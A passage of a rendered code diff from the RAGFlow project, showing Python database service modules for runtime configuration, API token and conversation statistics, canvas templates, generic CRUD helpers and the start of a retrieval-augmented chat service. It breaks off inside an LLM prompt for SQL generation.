# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from api.versions import get_versions
|
||||
from .reload_config_base import ReloadConfigBase
|
||||
|
||||
|
||||
class RuntimeConfig(ReloadConfigBase):
|
||||
DEBUG = None
|
||||
WORK_MODE = None
|
||||
HTTP_PORT = None
|
||||
JOB_SERVER_HOST = None
|
||||
JOB_SERVER_VIP = None
|
||||
ENV = dict()
|
||||
SERVICE_DB = None
|
||||
LOAD_CONFIG_MANAGER = False
|
||||
|
||||
@classmethod
|
||||
def init_config(cls, **kwargs):
|
||||
for k, v in kwargs.items():
|
||||
if hasattr(cls, k):
|
||||
setattr(cls, k, v)
|
||||
|
||||
@classmethod
|
||||
def init_env(cls):
|
||||
cls.ENV.update(get_versions())
|
||||
|
||||
@classmethod
|
||||
def load_config_manager(cls):
|
||||
cls.LOAD_CONFIG_MANAGER = True
|
||||
|
||||
@classmethod
|
||||
def get_env(cls, key):
|
||||
return cls.ENV.get(key, None)
|
||||
|
||||
@classmethod
|
||||
def get_all_env(cls):
|
||||
return cls.ENV
|
||||
|
||||
@classmethod
|
||||
def set_service_db(cls, service_db):
|
||||
cls.SERVICE_DB = service_db
|
||||
|
||||
@ -1,38 +1,38 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import pathlib
|
||||
import re
|
||||
from .user_service import UserService
|
||||
|
||||
|
||||
def duplicate_name(query_func, **kwargs):
|
||||
fnm = kwargs["name"]
|
||||
objs = query_func(**kwargs)
|
||||
if not objs: return fnm
|
||||
ext = pathlib.Path(fnm).suffix #.jpg
|
||||
nm = re.sub(r"%s$"%ext, "", fnm)
|
||||
r = re.search(r"\(([0-9]+)\)$", nm)
|
||||
c = 0
|
||||
if r:
|
||||
c = int(r.group(1))
|
||||
nm = re.sub(r"\([0-9]+\)$", "", nm)
|
||||
c += 1
|
||||
nm = f"{nm}({c})"
|
||||
if ext: nm += f"{ext}"
|
||||
|
||||
kwargs["name"] = nm
|
||||
return duplicate_name(query_func, **kwargs)
|
||||
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import pathlib
|
||||
import re
|
||||
from .user_service import UserService
|
||||
|
||||
|
||||
def duplicate_name(query_func, **kwargs):
|
||||
fnm = kwargs["name"]
|
||||
objs = query_func(**kwargs)
|
||||
if not objs: return fnm
|
||||
ext = pathlib.Path(fnm).suffix #.jpg
|
||||
nm = re.sub(r"%s$"%ext, "", fnm)
|
||||
r = re.search(r"\(([0-9]+)\)$", nm)
|
||||
c = 0
|
||||
if r:
|
||||
c = int(r.group(1))
|
||||
nm = re.sub(r"\([0-9]+\)$", "", nm)
|
||||
c += 1
|
||||
nm = f"{nm}({c})"
|
||||
if ext: nm += f"{ext}"
|
||||
|
||||
kwargs["name"] = nm
|
||||
return duplicate_name(query_func, **kwargs)
|
||||
|
||||
|
||||
@ -1,66 +1,70 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
import peewee
|
||||
from api.db.db_models import DB, API4Conversation, APIToken, Dialog
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.utils import current_timestamp, datetime_format
|
||||
|
||||
|
||||
class APITokenService(CommonService):
|
||||
model = APIToken
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def used(cls, token):
|
||||
return cls.model.update({
|
||||
"update_time": current_timestamp(),
|
||||
"update_date": datetime_format(datetime.now()),
|
||||
}).where(
|
||||
cls.model.token == token
|
||||
)
|
||||
|
||||
|
||||
class API4ConversationService(CommonService):
|
||||
model = API4Conversation
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def append_message(cls, id, conversation):
|
||||
cls.update_by_id(id, conversation)
|
||||
return cls.model.update(round=cls.model.round + 1).where(cls.model.id==id).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def stats(cls, tenant_id, from_date, to_date):
|
||||
return cls.model.select(
|
||||
cls.model.create_date.truncate("day").alias("dt"),
|
||||
peewee.fn.COUNT(
|
||||
cls.model.id).alias("pv"),
|
||||
peewee.fn.COUNT(
|
||||
cls.model.user_id.distinct()).alias("uv"),
|
||||
peewee.fn.SUM(
|
||||
cls.model.tokens).alias("tokens"),
|
||||
peewee.fn.SUM(
|
||||
cls.model.duration).alias("duration"),
|
||||
peewee.fn.AVG(
|
||||
cls.model.round).alias("round"),
|
||||
peewee.fn.SUM(
|
||||
cls.model.thumb_up).alias("thumb_up")
|
||||
).join(Dialog, on=(cls.model.dialog_id == Dialog.id & Dialog.tenant_id == tenant_id)).where(
|
||||
cls.model.create_date >= from_date,
|
||||
cls.model.create_date <= to_date
|
||||
).group_by(cls.model.create_date.truncate("day")).dicts()
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
|
||||
import peewee
|
||||
|
||||
from api.db.db_models import DB, API4Conversation, APIToken, Dialog
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.utils import current_timestamp, datetime_format
|
||||
|
||||
|
||||
class APITokenService(CommonService):
|
||||
model = APIToken
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def used(cls, token):
|
||||
return cls.model.update({
|
||||
"update_time": current_timestamp(),
|
||||
"update_date": datetime_format(datetime.now()),
|
||||
}).where(
|
||||
cls.model.token == token
|
||||
)
|
||||
|
||||
|
||||
class API4ConversationService(CommonService):
|
||||
model = API4Conversation
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def append_message(cls, id, conversation):
|
||||
cls.update_by_id(id, conversation)
|
||||
return cls.model.update(round=cls.model.round + 1).where(cls.model.id == id).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def stats(cls, tenant_id, from_date, to_date, source=None):
|
||||
if len(to_date) == 10: to_date += " 23:59:59"
|
||||
return cls.model.select(
|
||||
cls.model.create_date.truncate("day").alias("dt"),
|
||||
peewee.fn.COUNT(
|
||||
cls.model.id).alias("pv"),
|
||||
peewee.fn.COUNT(
|
||||
cls.model.user_id.distinct()).alias("uv"),
|
||||
peewee.fn.SUM(
|
||||
cls.model.tokens).alias("tokens"),
|
||||
peewee.fn.SUM(
|
||||
cls.model.duration).alias("duration"),
|
||||
peewee.fn.AVG(
|
||||
cls.model.round).alias("round"),
|
||||
peewee.fn.SUM(
|
||||
cls.model.thumb_up).alias("thumb_up")
|
||||
).join(Dialog, on=((cls.model.dialog_id == Dialog.id) & (Dialog.tenant_id == tenant_id))).where(
|
||||
cls.model.create_date >= from_date,
|
||||
cls.model.create_date <= to_date,
|
||||
cls.model.source == source
|
||||
).group_by(cls.model.create_date.truncate("day")).dicts()
|
||||
|
||||
26
api/db/services/canvas_service.py
Normal file
26
api/db/services/canvas_service.py
Normal file
@ -0,0 +1,26 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
import peewee
|
||||
from api.db.db_models import DB, API4Conversation, APIToken, Dialog, CanvasTemplate, UserCanvas
|
||||
from api.db.services.common_service import CommonService
|
||||
|
||||
|
||||
class CanvasTemplateService(CommonService):
|
||||
model = CanvasTemplate
|
||||
|
||||
class UserCanvasService(CommonService):
|
||||
model = UserCanvas
|
||||
@ -1,183 +1,183 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
|
||||
import peewee
|
||||
|
||||
from api.db.db_models import DB
|
||||
from api.utils import datetime_format, current_timestamp, get_uuid
|
||||
|
||||
|
||||
class CommonService:
|
||||
model = None
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def query(cls, cols=None, reverse=None, order_by=None, **kwargs):
|
||||
return cls.model.query(cols=cols, reverse=reverse,
|
||||
order_by=order_by, **kwargs)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_all(cls, cols=None, reverse=None, order_by=None):
|
||||
if cols:
|
||||
query_records = cls.model.select(*cols)
|
||||
else:
|
||||
query_records = cls.model.select()
|
||||
if reverse is not None:
|
||||
if not order_by or not hasattr(cls, order_by):
|
||||
order_by = "create_time"
|
||||
if reverse is True:
|
||||
query_records = query_records.order_by(
|
||||
cls.model.getter_by(order_by).desc())
|
||||
elif reverse is False:
|
||||
query_records = query_records.order_by(
|
||||
cls.model.getter_by(order_by).asc())
|
||||
return query_records
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get(cls, **kwargs):
|
||||
return cls.model.get(**kwargs)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_or_none(cls, **kwargs):
|
||||
try:
|
||||
return cls.model.get(**kwargs)
|
||||
except peewee.DoesNotExist:
|
||||
return None
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def save(cls, **kwargs):
|
||||
# if "id" not in kwargs:
|
||||
# kwargs["id"] = get_uuid()
|
||||
sample_obj = cls.model(**kwargs).save(force_insert=True)
|
||||
return sample_obj
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert(cls, **kwargs):
|
||||
if "id" not in kwargs:
|
||||
kwargs["id"] = get_uuid()
|
||||
kwargs["create_time"] = current_timestamp()
|
||||
kwargs["create_date"] = datetime_format(datetime.now())
|
||||
kwargs["update_time"] = current_timestamp()
|
||||
kwargs["update_date"] = datetime_format(datetime.now())
|
||||
sample_obj = cls.model(**kwargs).save(force_insert=True)
|
||||
return sample_obj
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert_many(cls, data_list, batch_size=100):
|
||||
with DB.atomic():
|
||||
for d in data_list:
|
||||
d["create_time"] = current_timestamp()
|
||||
d["create_date"] = datetime_format(datetime.now())
|
||||
for i in range(0, len(data_list), batch_size):
|
||||
cls.model.insert_many(data_list[i:i + batch_size]).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_many_by_id(cls, data_list):
|
||||
with DB.atomic():
|
||||
for data in data_list:
|
||||
data["update_time"] = current_timestamp()
|
||||
data["update_date"] = datetime_format(datetime.now())
|
||||
cls.model.update(data).where(
|
||||
cls.model.id == data["id"]).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_by_id(cls, pid, data):
|
||||
data["update_time"] = current_timestamp()
|
||||
data["update_date"] = datetime_format(datetime.now())
|
||||
num = cls.model.update(data).where(cls.model.id == pid).execute()
|
||||
return num
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_id(cls, pid):
|
||||
try:
|
||||
obj = cls.model.query(id=pid)[0]
|
||||
return True, obj
|
||||
except Exception as e:
|
||||
return False, None
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_ids(cls, pids, cols=None):
|
||||
if cols:
|
||||
objs = cls.model.select(*cols)
|
||||
else:
|
||||
objs = cls.model.select()
|
||||
return objs.where(cls.model.id.in_(pids))
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete_by_id(cls, pid):
|
||||
return cls.model.delete().where(cls.model.id == pid).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def filter_delete(cls, filters):
|
||||
with DB.atomic():
|
||||
num = cls.model.delete().where(*filters).execute()
|
||||
return num
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def filter_update(cls, filters, update_data):
|
||||
with DB.atomic():
|
||||
return cls.model.update(update_data).where(*filters).execute()
|
||||
|
||||
@staticmethod
|
||||
def cut_list(tar_list, n):
|
||||
length = len(tar_list)
|
||||
arr = range(length)
|
||||
result = [tuple(tar_list[x:(x + n)]) for x in arr[::n]]
|
||||
return result
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def filter_scope_list(cls, in_key, in_filters_list,
|
||||
filters=None, cols=None):
|
||||
in_filters_tuple_list = cls.cut_list(in_filters_list, 20)
|
||||
if not filters:
|
||||
filters = []
|
||||
res_list = []
|
||||
if cols:
|
||||
for i in in_filters_tuple_list:
|
||||
query_records = cls.model.select(
|
||||
*
|
||||
cols).where(
|
||||
getattr(
|
||||
cls.model,
|
||||
in_key).in_(i),
|
||||
*
|
||||
filters)
|
||||
if query_records:
|
||||
res_list.extend(
|
||||
[query_record for query_record in query_records])
|
||||
else:
|
||||
for i in in_filters_tuple_list:
|
||||
query_records = cls.model.select().where(
|
||||
getattr(cls.model, in_key).in_(i), *filters)
|
||||
if query_records:
|
||||
res_list.extend(
|
||||
[query_record for query_record in query_records])
|
||||
return res_list
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
|
||||
import peewee
|
||||
|
||||
from api.db.db_models import DB
|
||||
from api.utils import datetime_format, current_timestamp, get_uuid
|
||||
|
||||
|
||||
class CommonService:
|
||||
model = None
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def query(cls, cols=None, reverse=None, order_by=None, **kwargs):
|
||||
return cls.model.query(cols=cols, reverse=reverse,
|
||||
order_by=order_by, **kwargs)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_all(cls, cols=None, reverse=None, order_by=None):
|
||||
if cols:
|
||||
query_records = cls.model.select(*cols)
|
||||
else:
|
||||
query_records = cls.model.select()
|
||||
if reverse is not None:
|
||||
if not order_by or not hasattr(cls, order_by):
|
||||
order_by = "create_time"
|
||||
if reverse is True:
|
||||
query_records = query_records.order_by(
|
||||
cls.model.getter_by(order_by).desc())
|
||||
elif reverse is False:
|
||||
query_records = query_records.order_by(
|
||||
cls.model.getter_by(order_by).asc())
|
||||
return query_records
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get(cls, **kwargs):
|
||||
return cls.model.get(**kwargs)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_or_none(cls, **kwargs):
|
||||
try:
|
||||
return cls.model.get(**kwargs)
|
||||
except peewee.DoesNotExist:
|
||||
return None
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def save(cls, **kwargs):
|
||||
# if "id" not in kwargs:
|
||||
# kwargs["id"] = get_uuid()
|
||||
sample_obj = cls.model(**kwargs).save(force_insert=True)
|
||||
return sample_obj
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert(cls, **kwargs):
|
||||
if "id" not in kwargs:
|
||||
kwargs["id"] = get_uuid()
|
||||
kwargs["create_time"] = current_timestamp()
|
||||
kwargs["create_date"] = datetime_format(datetime.now())
|
||||
kwargs["update_time"] = current_timestamp()
|
||||
kwargs["update_date"] = datetime_format(datetime.now())
|
||||
sample_obj = cls.model(**kwargs).save(force_insert=True)
|
||||
return sample_obj
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert_many(cls, data_list, batch_size=100):
|
||||
with DB.atomic():
|
||||
for d in data_list:
|
||||
d["create_time"] = current_timestamp()
|
||||
d["create_date"] = datetime_format(datetime.now())
|
||||
for i in range(0, len(data_list), batch_size):
|
||||
cls.model.insert_many(data_list[i:i + batch_size]).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_many_by_id(cls, data_list):
|
||||
with DB.atomic():
|
||||
for data in data_list:
|
||||
data["update_time"] = current_timestamp()
|
||||
data["update_date"] = datetime_format(datetime.now())
|
||||
cls.model.update(data).where(
|
||||
cls.model.id == data["id"]).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_by_id(cls, pid, data):
|
||||
data["update_time"] = current_timestamp()
|
||||
data["update_date"] = datetime_format(datetime.now())
|
||||
num = cls.model.update(data).where(cls.model.id == pid).execute()
|
||||
return num
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_id(cls, pid):
|
||||
try:
|
||||
obj = cls.model.query(id=pid)[0]
|
||||
return True, obj
|
||||
except Exception as e:
|
||||
return False, None
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_ids(cls, pids, cols=None):
|
||||
if cols:
|
||||
objs = cls.model.select(*cols)
|
||||
else:
|
||||
objs = cls.model.select()
|
||||
return objs.where(cls.model.id.in_(pids))
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete_by_id(cls, pid):
|
||||
return cls.model.delete().where(cls.model.id == pid).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def filter_delete(cls, filters):
|
||||
with DB.atomic():
|
||||
num = cls.model.delete().where(*filters).execute()
|
||||
return num
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def filter_update(cls, filters, update_data):
|
||||
with DB.atomic():
|
||||
return cls.model.update(update_data).where(*filters).execute()
|
||||
|
||||
@staticmethod
|
||||
def cut_list(tar_list, n):
|
||||
length = len(tar_list)
|
||||
arr = range(length)
|
||||
result = [tuple(tar_list[x:(x + n)]) for x in arr[::n]]
|
||||
return result
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def filter_scope_list(cls, in_key, in_filters_list,
|
||||
filters=None, cols=None):
|
||||
in_filters_tuple_list = cls.cut_list(in_filters_list, 20)
|
||||
if not filters:
|
||||
filters = []
|
||||
res_list = []
|
||||
if cols:
|
||||
for i in in_filters_tuple_list:
|
||||
query_records = cls.model.select(
|
||||
*
|
||||
cols).where(
|
||||
getattr(
|
||||
cls.model,
|
||||
in_key).in_(i),
|
||||
*
|
||||
filters)
|
||||
if query_records:
|
||||
res_list.extend(
|
||||
[query_record for query_record in query_records])
|
||||
else:
|
||||
for i in in_filters_tuple_list:
|
||||
query_records = cls.model.select().where(
|
||||
getattr(cls.model, in_key).in_(i), *filters)
|
||||
if query_records:
|
||||
res_list.extend(
|
||||
[query_record for query_record in query_records])
|
||||
return res_list
|
||||
|
||||
@ -1,301 +1,482 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
from copy import deepcopy
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.db_models import Dialog, Conversation
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
|
||||
from api.settings import chat_logger, retrievaler
|
||||
from rag.app.resume import forbidden_select_fields4resume
|
||||
from rag.nlp.search import index_name
|
||||
from rag.utils import rmSpace, num_tokens_from_string, encoder
|
||||
|
||||
|
||||
class DialogService(CommonService):
|
||||
model = Dialog
|
||||
|
||||
|
||||
class ConversationService(CommonService):
|
||||
model = Conversation
|
||||
|
||||
|
||||
def message_fit_in(msg, max_length=4000):
|
||||
def count():
|
||||
nonlocal msg
|
||||
tks_cnts = []
|
||||
for m in msg:
|
||||
tks_cnts.append(
|
||||
{"role": m["role"], "count": num_tokens_from_string(m["content"])})
|
||||
total = 0
|
||||
for m in tks_cnts:
|
||||
total += m["count"]
|
||||
return total
|
||||
|
||||
c = count()
|
||||
if c < max_length:
|
||||
return c, msg
|
||||
|
||||
msg_ = [m for m in msg[:-1] if m["role"] == "system"]
|
||||
msg_.append(msg[-1])
|
||||
msg = msg_
|
||||
c = count()
|
||||
if c < max_length:
|
||||
return c, msg
|
||||
|
||||
ll = num_tokens_from_string(msg_[0].content)
|
||||
l = num_tokens_from_string(msg_[-1].content)
|
||||
if ll / (ll + l) > 0.8:
|
||||
m = msg_[0].content
|
||||
m = encoder.decode(encoder.encode(m)[:max_length - l])
|
||||
msg[0].content = m
|
||||
return max_length, msg
|
||||
|
||||
m = msg_[1].content
|
||||
m = encoder.decode(encoder.encode(m)[:max_length - l])
|
||||
msg[1].content = m
|
||||
return max_length, msg
|
||||
|
||||
|
||||
def chat(dialog, messages, stream=True, **kwargs):
|
||||
assert messages[-1]["role"] == "user", "The last content of this conversation is not from user."
|
||||
llm = LLMService.query(llm_name=dialog.llm_id)
|
||||
if not llm:
|
||||
llm = TenantLLMService.query(tenant_id=dialog.tenant_id, llm_name=dialog.llm_id)
|
||||
if not llm:
|
||||
raise LookupError("LLM(%s) not found" % dialog.llm_id)
|
||||
max_tokens = 1024
|
||||
else: max_tokens = llm[0].max_tokens
|
||||
kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
if len(embd_nms) != 1:
|
||||
yield {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
|
||||
return {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
|
||||
|
||||
questions = [m["content"] for m in messages if m["role"] == "user"]
|
||||
embd_mdl = LLMBundle(dialog.tenant_id, LLMType.EMBEDDING, embd_nms[0])
|
||||
chat_mdl = LLMBundle(dialog.tenant_id, LLMType.CHAT, dialog.llm_id)
|
||||
|
||||
prompt_config = dialog.prompt_config
|
||||
field_map = KnowledgebaseService.get_field_map(dialog.kb_ids)
|
||||
# try to use sql if field mapping is good to go
|
||||
if field_map:
|
||||
chat_logger.info("Use SQL to retrieval:{}".format(questions[-1]))
|
||||
ans = use_sql(questions[-1], field_map, dialog.tenant_id, chat_mdl, prompt_config.get("quote", True))
|
||||
if ans:
|
||||
yield ans
|
||||
return
|
||||
|
||||
for p in prompt_config["parameters"]:
|
||||
if p["key"] == "knowledge":
|
||||
continue
|
||||
if p["key"] not in kwargs and not p["optional"]:
|
||||
raise KeyError("Miss parameter: " + p["key"])
|
||||
if p["key"] not in kwargs:
|
||||
prompt_config["system"] = prompt_config["system"].replace(
|
||||
"{%s}" % p["key"], " ")
|
||||
|
||||
for _ in range(len(questions) // 2):
|
||||
questions.append(questions[-1])
|
||||
if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
|
||||
kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
|
||||
else:
|
||||
kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
|
||||
dialog.similarity_threshold,
|
||||
dialog.vector_similarity_weight,
|
||||
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
|
||||
top=1024, aggs=False)
|
||||
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
|
||||
chat_logger.info(
|
||||
"{}->{}".format(" ".join(questions), "\n->".join(knowledges)))
|
||||
|
||||
if not knowledges and prompt_config.get("empty_response"):
|
||||
yield {"answer": prompt_config["empty_response"], "reference": kbinfos}
|
||||
return {"answer": prompt_config["empty_response"], "reference": kbinfos}
|
||||
|
||||
kwargs["knowledge"] = "\n".join(knowledges)
|
||||
gen_conf = dialog.llm_setting
|
||||
msg = [{"role": m["role"], "content": m["content"]}
|
||||
for m in messages if m["role"] != "system"]
|
||||
used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
|
||||
if "max_tokens" in gen_conf:
|
||||
gen_conf["max_tokens"] = min(
|
||||
gen_conf["max_tokens"],
|
||||
max_tokens - used_token_count)
|
||||
|
||||
def decorate_answer(answer):
|
||||
nonlocal prompt_config, knowledges, kwargs, kbinfos
|
||||
if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
|
||||
answer, idx = retrievaler.insert_citations(answer,
|
||||
[ck["content_ltks"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
[ck["vector"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
embd_mdl,
|
||||
tkweight=1 - dialog.vector_similarity_weight,
|
||||
vtweight=dialog.vector_similarity_weight)
|
||||
idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
|
||||
recall_docs = [
|
||||
d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
|
||||
if not recall_docs: recall_docs = kbinfos["doc_aggs"]
|
||||
kbinfos["doc_aggs"] = recall_docs
|
||||
|
||||
refs = deepcopy(kbinfos)
|
||||
for c in refs["chunks"]:
|
||||
if c.get("vector"):
|
||||
del c["vector"]
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api")>=0:
|
||||
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
|
||||
return {"answer": answer, "reference": refs}
|
||||
|
||||
if stream:
|
||||
answer = ""
|
||||
for ans in chat_mdl.chat_streamly(prompt_config["system"].format(**kwargs), msg, gen_conf):
|
||||
answer = ans
|
||||
yield {"answer": answer, "reference": {}}
|
||||
yield decorate_answer(answer)
|
||||
else:
|
||||
answer = chat_mdl.chat(
|
||||
prompt_config["system"].format(
|
||||
**kwargs), msg, gen_conf)
|
||||
chat_logger.info("User: {}|Assistant: {}".format(
|
||||
msg[-1]["content"], answer))
|
||||
yield decorate_answer(answer)
|
||||
|
||||
|
||||
def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
sys_prompt = "你是一个DBA。你需要这对以下表的字段结构,根据用户的问题列表,写出最后一个问题对应的SQL。"
|
||||
user_promt = """
|
||||
表名:{};
|
||||
数据库表字段说明如下:
|
||||
{}
|
